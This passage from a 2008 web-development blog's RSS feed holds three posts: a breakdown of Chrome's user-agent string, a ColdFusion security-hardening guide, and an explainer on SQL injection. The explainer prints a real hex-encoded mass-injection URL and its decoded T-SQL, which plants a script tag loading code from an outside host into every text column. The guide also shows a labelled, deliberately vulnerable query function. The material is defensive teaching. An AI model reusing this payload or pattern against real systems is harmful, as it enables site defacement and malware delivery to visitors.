<li><strong>en-US)</strong> &#8211; This indicates the user interface language of the browser (U.S. English in this case). This may be used to choose between different <em>content</em> languages even though <abbr title="HyperText Transfer Protocol">HTTP</abbr> has a different header for that purpose.</li>
<li><strong>AppleWebKit/</strong> &#8211; This indicates that the engine of the browser is <a href="http://webkit.org/" title="Webkit opensource project" target="_blank" rel="nofollow">WebKit</a> as opposed to being <a href="http://developer.mozilla.org/en/Gecko" title="Mozilla: Gecko Layout Engine" target="_blank" rel="nofollow">Gecko</a>. Developers should not do user agent sniffing as a rule, but if they still do, this is what they should be sniffing.</li>
<li><strong>525.13</strong> &#8211; This is the WebKit version from which Chrome branched its copy. Site admins could use this to detect old versions with known bugs.</li>
<li><strong>(KHTML, like Gecko)</strong> &#8211; This introduces the substring <q>Gecko</q> into the <abbr title="User-Agent">UA</abbr> string while pointing out to human readers that WebKit was forked from <a href="http://en.wikipedia.org/wiki/KHTML" title="Wikipedia: KHTML" target="_blank" rel="nofollow">KHTML</a>. Without this substring, Chrome might be put in the same category as <abbr title="Internet Explorer">IE</abbr> and Netscape 4.</li>
<li><strong>Chrome/</strong> &#8211; This string identifies the browser as actually Google Chrome.</li>
<li><strong>0.2.149.29</strong> &#8211; This is the Chrome version. This could be used to detect old versions with known bugs.</li>
<li><strong>Safari/</strong> &#8211; This means that the browser is like Safari as opposed to being like Firefox.</li>
<li><strong>525.13</strong> &#8211; This just repeats the WebKit version in order to have <em>some</em> version but not the irrelevant Safari.app version.</li>
</ul>
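<p>The breakdown above can be sketched in code. What follows is a minimal Python illustration, not a full RFC 2616 parser and not anything Chrome itself ships: <code>parse_user_agent</code> and <code>engine_version</code> are hypothetical helper names, and the regular expression assumes comments are not nested. It splits the string into product tokens and parenthesised comments, then reads the <code>AppleWebKit</code> version, which is the part worth inspecting if you must sniff at all.</p>

```python
import re

# Illustrative tokenizer (an assumption, not a complete RFC 2616 grammar):
# matches either a parenthesised comment or a "name/version" product token.
TOKEN_RE = re.compile(r"\(([^)]*)\)|([^\s/()]+)(?:/(\S+))?")


def parse_user_agent(ua):
    """Return ("product", name, version) and ("comment", [parts]) tuples in order."""
    parts = []
    for comment, name, version in TOKEN_RE.findall(ua):
        if name:
            parts.append(("product", name, version))
        else:
            # Comment fields are separated by semicolons, e.g. "Windows; U; ...".
            parts.append(("comment", [p.strip() for p in comment.split(";")]))
    return parts


def engine_version(ua):
    """Return the AppleWebKit version string, or None if the token is absent."""
    for part in parse_user_agent(ua):
        if part[0] == "product" and part[1] == "AppleWebKit":
            return part[2]
    return None
```

<p>Calling <code>engine_version</code> on the Chrome string shown earlier yields the WebKit version, which a site could compare against a list of versions with known bugs instead of matching on the browser name.</p>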
]]></content:encoded>
			<wfw:commentRss>http://www.simonwhatley.co.uk/whats-in-google-chromes-user-agent-string/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to Protect Your Website from a Malicious Attack</title>
		<link>http://www.simonwhatley.co.uk/how-to-protect-your-website-from-a-malicious-attack</link>
		<comments>http://www.simonwhatley.co.uk/how-to-protect-your-website-from-a-malicious-attack#comments</comments>
		<pubDate>Mon, 18 Aug 2008 12:54:20 +0000</pubDate>
		<dc:creator>Simon</dc:creator>
				<category><![CDATA[Development]]></category>
		<category><![CDATA[Adobe]]></category>
		<category><![CDATA[Application.cfc]]></category>
		<category><![CDATA[Application.cfm]]></category>
		<category><![CDATA[attack]]></category>
		<category><![CDATA[best practice]]></category>
		<category><![CDATA[Business]]></category>
		<category><![CDATA[cfquery]]></category>
		<category><![CDATA[cfqueryparam]]></category>
		<category><![CDATA[ColdFusion]]></category>
		<category><![CDATA[ColdFusion Administrator]]></category>
		<category><![CDATA[cross-site scripting]]></category>
		<category><![CDATA[database server]]></category>
		<category><![CDATA[Databases]]></category>
		<category><![CDATA[encryption]]></category>
		<category><![CDATA[firewall]]></category>
		<category><![CDATA[how to]]></category>
		<category><![CDATA[howto]]></category>
		<category><![CDATA[Java]]></category>
		<category><![CDATA[Manitoba]]></category>
		<category><![CDATA[Mark Kruger]]></category>
		<category><![CDATA[prevention]]></category>
		<category><![CDATA[protection]]></category>
		<category><![CDATA[raw processing]]></category>
		<category><![CDATA[RDBMS]]></category>
		<category><![CDATA[script protect]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[software releases]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[SQL Injection]]></category>
		<category><![CDATA[url]]></category>
		<category><![CDATA[variables]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[Web Application Hacker]]></category>
		<category><![CDATA[web code]]></category>
		<category><![CDATA[Web Security]]></category>
		<category><![CDATA[Web Server]]></category>
		<category><![CDATA[Web Servers]]></category>
		<category><![CDATA[webserver]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://www.simonwhatley.co.uk/?p=809</guid>
		<description><![CDATA[Every seasoned developer will know that protecting your website from a hacker is a top priority, whether for your own reputation or for maintaining your company's reputation and long-term revenue prospects.]]></description>
			<content:encoded><![CDATA[<p>Every seasoned developer will know that protecting your website from a hacker is a top priority, whether for your own reputation or for maintaining your company&#8217;s reputation and long-term revenue prospects.</p>
<p><strong>Why should you be worried about security?</strong></p>
<p>The Web is changing many of the assumptions that people have historically made about computer security and publishing. As the Internet makes it possible for web servers to publish information to millions of users, it also makes it possible for computer hackers, crackers, criminals, vandals, and other &#8220;bad guys&#8221; to break into the very computers on which the web servers are running. Once subverted, web servers can be used by attackers as a launching point for conducting further attacks against users and organisations.</p>
<p>It is considerably more expensive and more time-consuming to recover from a security incident than to take preventative measures ahead of time.</p>
<p>This blog post started on the premise of protecting your website from a <a href="http://en.wikipedia.org/wiki/SQL_injection" title="Wikipedia: SQL Injection" target="_blank" rel="nofollow">SQL Injection</a> Attack. However, it is also appropriate to discuss, at a relatively high level, how to secure your server architecture and applications.</p>
<h3>Server-Level Security</h3>
<ul>
<li>Separate web- and database-servers onto different physical machines.</li>
<li>Secure the web- and database-servers with traditional techniques. Only authorised accounts should have the capabilities to run tasks on the machine. That means not giving administrator rights to the user accounts the servers run under.</li>
<li>Keep servers up-to-date with the latest patches and software releases.</li>
<li>Minimise the number of services running on the server. This means limiting the services to only those required for the web- or database-servers to function.</li>
<li>Secure information in transit between servers. This may mean physically securing the network to prevent eavesdropping, encrypting the traffic or obfuscating the data amongst innocuous &#8216;noise&#8217;.</li>
<li>Secure the database server behind a firewall.</li>
</ul>
<h3>Application-Level Security</h3>
<ul>
<li>Run ColdFusion, the webserver and the database server under separate user accounts. They should never share the same system account.</li>
<li>Create a database user specifically for your ColdFusion datasource and restrict it to only the activities required for the application. The user should not have database-owner rights, access to databases not relating to the application or access to the system tables.</li>
<li>Revoke privileges in the ColdFusion datasource definition to prevent the SQL commands <code>CREATE</code>, <code>DROP</code>, <code>GRANT</code>, <code>REVOKE</code> and <code>ALTER</code>.</li>
<li>General settings in the ColdFusion Administrator:
<ul>
<li>Check the <em>Disable access to internal ColdFusion Java components</em> option.</li>
<li>Check the <em>Enable Global Script Protection</em> option.</li>
<li>Add a <em>Missing Template Handler</em>.</li>
<li>Add a <em>Site-wide Error Handler</em>.</li>
<li>Reduce the <em>Maximum size of post data</em> from 100<abbr title="megabytes">MB</abbr>.</li>
<li>Enable <em>Timeout Requests</em>, and set to 60 seconds or less.</li>
<li>Disable <em>Robust Exception Information</em> on production servers.</li>
</ul>
</li>
</ul>
<h3>Code-Level Security</h3>
<ul>
<li>Application.cfc &#8211; Set the <code>scriptProtect</code> application variable (<code>this.scriptProtect</code>) to <code>all</code> to enable application-wide cross-site script protection.
</li>
<li>CFQueryParam &#8211; This tag, importantly, verifies the data type of a query parameter and, for <abbr title="Relational Database Management Systems">RDBMS</abbr>s that support bind variables, enables ColdFusion to use bind variables in the <acronym title="Structured Query Language">SQL</acronym> statement. Bind variable usage enhances performance when executing a <code>cfquery</code> statement multiple times.

<div class="wp_syntax"><div class="code"><pre class="cfm" style="font-family:monospace;"><span style="color: #333333;"><span style="color: #800000;">&lt;cfquery</span> <span style="color: #0000ff;">name</span><span style="color: #0000ff;">=</span><span style="color: #009900;">&quot;qry&quot;</span> <span style="color: #0000ff">datasource</span><span style="color: #0000ff;">=</span><span style="color: #009900;">&quot;#APPLICATION.dsn#&quot;</span><span style="color: #800000;">&gt;</span></span>
SELECT column1, column2, column3
FROM tableName
WHERE column4 = <span style="color: #333333;"><span style="color: #800000;">&lt;cfqueryparam</span> <span style="color: #0000ff;">value</span><span style="color: #0000ff;">=</span><span style="color: #009900;">&quot;#variable1#&quot;</span> <span style="color: #0000ff">cfsqltype</span><span style="color: #0000ff;">=</span><span style="color: #009900;">&quot;cf_sql_bit&quot;</span> <span style="color: #0000ff;">/</span><span style="color: #800000;">&gt;</span></span>
AND column5 LIKE <span style="color: #333333;"><span style="color: #800000;">&lt;cfqueryparam</span> <span style="color: #0000ff;">value</span><span style="color: #0000ff;">=</span><span style="color: #009900;">&quot;%#variable2#%&quot;</span> <span style="color: #0000ff">cfsqltype</span><span style="color: #0000ff;">=</span><span style="color: #009900;">&quot;cf_sql_varchar&quot;</span> <span style="color: #0000ff;">maxlength</span><span style="color: #0000ff;">=</span><span style="color: #009900;">&quot;200&quot;</span> <span style="color: #0000ff;">/</span><span style="color: #800000;">&gt;</span></span>
AND column6 IN (<span style="color: #333333;"><span style="color: #800000;">&lt;cfqueryparam</span> <span style="color: #0000ff;">value</span><span style="color: #0000ff;">=</span><span style="color: #009900;">&quot;#variable3#&quot;</span> <span style="color: #0000ff">cfsqltype</span><span style="color: #0000ff;">=</span><span style="color: #009900;">&quot;cf_sql_integer&quot;</span> <span style="color: #0000ff">list</span><span style="color: #0000ff;">=</span><span style="color: #009900;">&quot;true&quot;</span> <span style="color: #0000ff;">/</span><span style="color: #800000;">&gt;</span></span>)
<span style="color: #333333;"><span style="color: #800000;">&lt;/cfquery&gt;</span></span></pre></div></div>

<p>There are limitations to the use of the <code>cfqueryparam</code> tag. In ColdFusion 7, for example, you cannot use it in queries that use the <code>cachedWithin</code> attribute. Similarly, it cannot be used in <code>ORDER BY</code> clauses, although conditional logic that chooses from a fixed set of column names should remove the need for variables in the <code>ORDER BY</code> clause.</p>
</li>
<li>Functions &#8211; As a rule of thumb, validate <em>all</em> the data being passed into a query before it is used. ColdFusion MX 7 saw the introduction of the <code>isValid()</code> function. This function tests whether a value meets a validation or data type rule and can be used to replace a large number of type-specific functions such as <code>isArray()</code>, <code>isBinary()</code>, <code>isBoolean()</code>, <code>isDate()</code>, <code>isNumeric()</code> and <code>isSimpleValue()</code>.
</li>
<li>Stored Procedures &#8211; I often favour the use of stored procedures over standard queries. Not only do they add an additional level of performance, they provide an additional level of security; ColdFusion does not do any raw processing of queries in the web code, it simply passes variables down the wire to the database server.</li>
</ul>
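<p>The three ideas in the list above (typed bind variables, up-front validation and a fixed set of sortable columns) can be sketched outside ColdFusion too. The following is a hedged Python illustration using the standard <code>sqlite3</code> module as a stand-in for <code>cfquery</code> and <code>cfqueryparam</code>; <code>find_rows</code> and <code>SORTABLE_COLUMNS</code> are hypothetical names, and the table and column names are simply borrowed from the example query above.</p>

```python
import sqlite3

# Hypothetical whitelist: the only column names a caller may sort by.
SORTABLE_COLUMNS = {"column1", "column2"}


def find_rows(conn, flag, search, ids, order_by="column1"):
    """Query tableName with bound values and a whitelisted ORDER BY column."""
    # Validate types first, roughly what cfsqltype and isValid() enforce.
    if flag not in (0, 1):
        raise ValueError("flag must be 0 or 1")
    ids = [int(i) for i in ids]  # raises ValueError for non-integer items
    if not ids:
        raise ValueError("ids must not be empty")
    if len(search) > 200:
        raise ValueError("search is longer than 200 characters")
    # Identifiers cannot be bound, so accept only known column names.
    if order_by not in SORTABLE_COLUMNS:
        raise ValueError("unsupported sort column")

    placeholders = ", ".join("?" for _ in ids)  # one marker per list item
    sql = (
        "SELECT column1, column2, column3 FROM tableName "
        "WHERE column4 = ? AND column5 LIKE ? "
        f"AND column6 IN ({placeholders}) ORDER BY {order_by}"
    )
    # Values travel separately from the SQL text and are never parsed as SQL.
    return conn.execute(sql, [flag, f"%{search}%", *ids]).fetchall()
```

<p>Only the placeholder markers and a whitelisted column name are ever interpolated into the statement. A list item such as <code>7; DROP TABLE tableName</code> fails the integer conversion and never reaches the database.</p>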
<h3>Additional Resources</h3>
<ul>
<li>
O&#8217;Reilly&#8217;s <a href="http://www.amazon.com/Web-Security-Privacy-Commerce-2nd/dp/0596000456/ref=pd_bbs_sr_1?ie=UTF8&#038;s=books&#038;qid=1218663002&#038;sr=8-1" title="Amazon: Web Security, Privacy and Commerce" target="_blank" rel="nofollow">Web Security, Privacy and Commerce</a></li>
<li>Wiley&#8217;s <a href="http://www.amazon.com/Web-Application-Hackers-Handbook-Discovering/dp/0470170778/ref=pd_bbs_sr_1?ie=UTF8&#038;s=books&#038;qid=1218663073&#038;sr=1-1" title="Amazon: The Web Application Hacker's Handbook" target="_blank" rel="nofollow">The Web Application Hacker&#8217;s Handbook</a></li>
<li>Adobe&#8217;s whitepaper &#8211; <a href="http://www.adobe.com/devnet/coldfusion/articles/dev_security/coldfusion_security_cf8.pdf" title="Adobe: ColdFusion 8 Security PDF" target="_blank" rel="nofollow">ColdFusion 8 Developer Security Guidelines</a> (<abbr title="Portable Document Format">PDF</abbr>, 281k)</li>
<li>Adobe&#8217;s whitepaper &#8211; <a href="http://www.adobe.com/devnet/coldfusion/articles/dev_security/coldfusion_security_cf7.pdf" title="Adobe: ColdFusion 7 Security PDF" target="_blank" rel="nofollow">ColdFusion 7 Developer Security Guidelines</a> (<abbr title="Portable Document Format">PDF</abbr>, 217k)</li>
<li>Adobe DevNet &#8211; <a href="http://www.adobe.com/devnet/coldfusion/articles/stored_procs.html" title="Learning Stored Procedure Basics in ColdFusion 8" target="_blank" rel="nofollow">Learning Stored Procedure Basics in ColdFusion 8</a></li>
<li>0x000000 # The Hacker Webzine&#8217;s article on <a href="http://www.0x000000.com/?i=610" title="The Hacker Webzine: Attacking ColdFusion" target="_blank" rel="nofollow">Attacking ColdFusion</a></li>
<li>Three-part series from Mark Kruger (ColdFusion Muse) &#8211; <a title="Query String with cfqueryparam" href="http://www.coldfusionmuse.com/index.cfm/2008/7/21/query-string-with-cfqueryparam" target="_blank" rel="nofollow">Part 1</a>, <a title="Using CAST and ASCII" href="http://www.coldfusionmuse.com/index.cfm/2008/7/18/Injection-Using-CAST-And-ASCII" target="_blank" rel="nofollow">Part 2</a>, <a title="Using Order By" href="http://www.coldfusionmuse.com/index.cfm/2008/7/21/SQL-injection-using-order-by" target="_blank" rel="nofollow">Part 3</a></li>
<li>Brad Wood&#8217;s article on <a href="http://www.codersrevolution.com/index.cfm/2008/7/26/cfqueryparam-its-not-just-for-security-also-when-NOT-to-use-it" title="CFQueryParam is not just for security - When not to use it" target="_blank" rel="nofollow">CFQueryParam is not just for security</a>.</li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.simonwhatley.co.uk/how-to-protect-your-website-from-a-malicious-attack/feed</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>What is a SQL Injection Attack</title>
		<link>http://www.simonwhatley.co.uk/what-is-a-sql-injection-attack</link>
		<comments>http://www.simonwhatley.co.uk/what-is-a-sql-injection-attack#comments</comments>
		<pubDate>Wed, 13 Aug 2008 13:09:45 +0000</pubDate>
		<dc:creator>Simon</dc:creator>
				<category><![CDATA[Development]]></category>
		<category><![CDATA[attack]]></category>
		<category><![CDATA[C#]]></category>
		<category><![CDATA[China]]></category>
		<category><![CDATA[ColdFusion]]></category>
		<category><![CDATA[cross-site scripting]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[malicious web users]]></category>
		<category><![CDATA[North Korea]]></category>
		<category><![CDATA[online world]]></category>
		<category><![CDATA[Russia]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[SQL Injection]]></category>
		<category><![CDATA[T]]></category>
		<category><![CDATA[url]]></category>
		<category><![CDATA[web applications]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://www.simonwhatley.co.uk/?p=812</guid>
		<description><![CDATA[Over the past few weeks, subversive elements in the international arena have decided that attacking websites is a fun thing to do! The online world has become the new battleground between nations vying to de-stabilise rivals. This may seem all very Jack Bauer, but we are increasingly seeing ‘SQL injection attacks’ emanating from countries such as Russia, China and North Korea. Of course, that doesn’t mean our countries aren’t doing the same in return, but we only see the results from foreign-based attacks.]]></description>
			<content:encoded><![CDATA[<p>Over the past few weeks, subversive elements in the international arena have decided that attacking websites is a fun thing to do! The online world has become the new battleground between nations vying to de-stabilise rivals. This may seem all very <a href="http://en.wikipedia.org/wiki/Jack_Bauer" title="Wikipedia: Jack Bauer" target="_blank" rel="nofollow">Jack Bauer</a>, but we are increasingly seeing &#8216;<acronym title="Structured Query Language">SQL</acronym> injection attacks&#8217; emanating from countries such as Russia, China and North Korea. Of course, that doesn&#8217;t mean our countries aren&#8217;t doing the same in return, but we only see the results from foreign-based attacks.</p>
<h3>What is a SQL Injection Attack?</h3>
<p><a href="http://en.wikipedia.org/wiki/SQL_injection" title="Wikipedia: SQL Injection" target="_blank" rel="nofollow">SQL Injection</a> is a technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is in fact an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.</p>
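<p>To make the definition concrete, here is a minimal sketch of the vulnerability, assuming Python&#8217;s built-in <code>sqlite3</code> module rather than ColdFusion and SQL Server. The <code>users</code> table, its contents and the three function names are all hypothetical and exist only for this illustration.</p>

```python
import sqlite3


def make_demo_db():
    """Build a throwaway in-memory database with two hypothetical users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "a-secret"), ("bob", "b-secret")],
    )
    return conn


def lookup_unsafe(conn, name):
    # VULNERABLE: user input is pasted straight into the SQL text, so a
    # quote character in the input can end the string literal early.
    sql = "SELECT secret FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, name):
    # The value is bound separately and is never parsed as SQL.
    sql = "SELECT secret FROM users WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()
```

<p>With the input <code>nobody' OR '1'='1</code>, the unsafe version returns every row because the injected <code>OR</code> clause is always true, while the bound version treats the whole input as a name and returns nothing.</p>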
<h3>Real World Example</h3>
<p><acronym title="Structured Query Language">SQL</acronym> Injection attacks are commonly associated with a technique called <a href="http://en.wikipedia.org/wiki/Cross-site_scripting" title="Wikipedia: Cross-Site Scripting" target="_blank" rel="nofollow">Cross-Site Scripting</a> (<abbr title="Cross-Site Scripting">XSS</abbr>). <abbr title="Cross-Site Scripting">XSS</abbr> is a type of computer security vulnerability, typically found in web applications, that allows malicious web users to inject code into the web pages viewed by other users.</p>
<p>In reality, what does this look like?</p>
<p>The following is a legitimate URL that may be navigated to by the user agent:</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">http://www.domain.com/folderName/fileName.cfm?variable1=0&amp;variable2=4241</pre></div></div>

<p>The following is a hacked URL:</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">http://www.domain.com/folderName/filename.cfm?
variable1=0&amp;variable2=4241;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C41524520405420766172636861722
8323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F522
0464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C7
56D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E787479706
53D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204
F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E5
44F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E2065786563282775706461746
5205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697
074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D272720776
865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D226874747
03A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E455854204
6524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736
F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);</pre></div></div>

<p>The code appended to the <abbr title="Uniform Resource Locator">URL</abbr> is a hexadecimal-encoded string that the <acronym title="Structured Query Language">SQL</acronym> engine can interpret: <code>CAST</code> converts it to character data and <code>EXEC</code> runs the result. When the hexadecimal string is decoded by the <acronym title="Structured Query Language">SQL</acronym> server, the <acronym title="Structured Query Language">SQL</acronym> code generated looks similar to the following:</p>

<div class="wp_syntax"><div class="code"><pre class="txt" style="font-family:monospace;">DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR
FOR SELECT a.name,b.name from sysobjects a,syscolumns b
WHERE a.id=b.id
AND a.xtype='u'
AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM  Table_Cursor
INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''&quot;&gt;&lt;/title&gt;
&lt;script src=&quot;http://1.verynx.cn/w.js&quot;&gt;&lt;/script&gt;&lt;!--''
where '+@C+' not like ''%&quot;&gt;&lt;/title&gt;
&lt;script src=&quot;http://1.verynx.cn/w.js&quot;&gt;&lt;/script&gt;&lt;!--''')
FETCH NEXT FROM  Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor</pre></div></div>
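
<p>You do not need a database server to inspect such a payload. As a small sketch in Python (<code>decode_hex_payload</code> is a hypothetical helper name, and the sample value is only the opening bytes of the string in the hacked URL above), the hexadecimal literal can be decoded offline:</p>

```python
def decode_hex_payload(hex_text):
    """Decode a hexadecimal literal, with or without a 0x prefix, to ASCII text."""
    if hex_text.lower().startswith("0x"):
        hex_text = hex_text[2:]
    # bytes.fromhex raises ValueError if the input is not valid hexadecimal.
    return bytes.fromhex(hex_text).decode("ascii")


# The first 40 bytes of the payload from the hacked URL.
prefix = (
    "0x4445434C415245204054207661726368617228323535292C"
    "40432076617263686172283430303029"
)
print(decode_hex_payload(prefix))
```

<p>Run against that prefix, the helper prints the first <code>DECLARE</code> statement of the decoded <acronym title="Structured Query Language">SQL</acronym>, which is a safe way to read what an attacker tried to execute when you find such strings in your access logs.</p>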

<p>Somewhat unhelpfully, if the user credentials used to access the database have access to the system tables of your database, the <acronym title="Structured Query Language">SQL</acronym> injection attack will be able to interrogate those system tables and determine the structure of your database. The result of the above example is that the following code is appended to every string-based column in every user table.</p>

<div class="wp_syntax"><div class="code"><pre class="txt" style="font-family:monospace;">&quot;&gt;&lt;/title&gt;&lt;script src=&quot;http://1.verynx.cn/w.js&quot;&gt;&lt;/script&gt;&lt;!--</pre></div></div>

<p>To put it simply, this is <em>very bad news</em>!</p>
<h3>ColdFusion-hacking is Popularised</h3>
<p>ColdFusion-based sites are by no means immune to this international &#8216;information war&#8217;. The popularity of attacks on ColdFusion-based websites is illustrated by the fact that an article was featured on <a href="http://www.0x000000.com/?i=610" title="0x000000.com - The Hacker Webzine">The Hacker Webzine</a> recently, detailing how to implement a successful attack.</p>
<h3>How to &#8216;Fix&#8217; the Problem</h3>
<p>As ColdFusion developers, we need not only to be aware of the problem but also to know how to fix it and how to guard against an attack before it happens.</p>
<p>In my next post, I will discuss how to protect against a <acronym title="Structured Query Language">SQL</acronym> injection attack.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.simonwhatley.co.uk/what-is-a-sql-injection-attack/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

